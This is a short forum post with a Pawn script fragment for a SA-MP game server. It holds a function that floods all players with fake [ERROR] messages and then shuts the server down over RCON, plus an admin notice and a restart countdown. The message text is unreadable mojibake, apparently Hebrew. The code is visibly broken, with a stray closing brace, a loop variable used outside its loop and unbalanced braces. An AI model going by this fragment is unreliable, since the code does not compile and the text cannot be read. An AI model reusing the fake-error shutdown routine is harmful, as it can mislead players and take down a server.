14.06.2016, 18:19
Код:
};
forward DownTheServer();
public DownTheServer()
{
for(new i=0; i<50; i++)
{
SendClientMessageToAll(-1, "{FF0000}оег вреб - мк ъзфщ ой йртрт аеък");
SendClientMessageToAll(-1, "{FF0000}[ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR] [ERROR]");
}
SendRconCommand("exit");
}
forward PasswordExit();
public PasswordExit() for(new i=0; i<MAX_PLAYERS; i++) if(IsAdminLevel(i)>11) SendClientMessage(i, -1, "{00FF00}ъжлешъ: ан ма ъчйщ аъ дсйсоа ъек гчд доег йфем");
forward GMX1(playerid);
public GMX1(playerid)
{
if(GMX_Sec> 0)
{
for(new i=0; i<MAX_PLAYERS; i++) if(IsPlayerConnected(i)) {
PlayerPlaySound(playerid,1056,0.0,0.0,0.0);}
format(str, sizeof(str), "~g~%d", GMX_Sec--);
GameTextForAll(str, 1000, 6);
}
else
{
if(IsPlayerConnected(i))
{
KillTimer(GMX_TIMER);
GMX = 0;
}
}
}
}

